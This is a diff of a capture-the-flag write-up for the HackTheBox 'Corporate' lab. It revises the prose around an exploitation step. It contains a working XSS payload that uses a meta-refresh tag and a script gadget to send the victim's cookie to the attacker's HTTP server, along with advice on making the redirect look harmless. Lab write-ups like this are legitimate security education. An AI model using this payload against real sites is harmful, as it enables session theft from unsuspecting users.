GabrielGonzalez211/gabrielgonzalez211.github.io/_writeups/2024/HTB/Corporate.md

 #### exploitation path

-Since we have found a way to execute javascript code in a url and we have HTML injection in the chat, a nice way to send us the agent cookie is to insert a `<meta>` tag that redirects to the xss url and send to our http server the cookie:
+Since we have found a way to execute javascript code in a url and we have HTML injection in the chat, a nice way to send us the agent cookie (if flag HttpOnly is false) is to insert a `<meta>` tag that redirects to the xss url and send to our http server the cookie:

 > payload: ```<meta http-equiv="refresh" content="0; url='http://corporate.htb/<script src=%22/vendor/analytics.min.js%22></script><script src=%22/assets/js/analytics.min.js?v=document.location=`http://10.10.14.133/?c=${document.cookie}`%22>'">```

-To make it realistic as it was a real attack, I will write to my own index.html to redirect to support.corporate.htb so the victim doesn't see nothing strange since it redirects to my own server and the victim can see his cookie in the url.
-Also spawn the http server with python:
+To make it realistic as it was a real attack, I will write to my own index.html to redirect to support.corporate.htb so the victim doesn't see nothing strange.
+I will do this since it redirects to my own server and the victim can see his cookie in the url.
+Remember to start the http server with python:

 ```bash
 ❯ mkdir web-server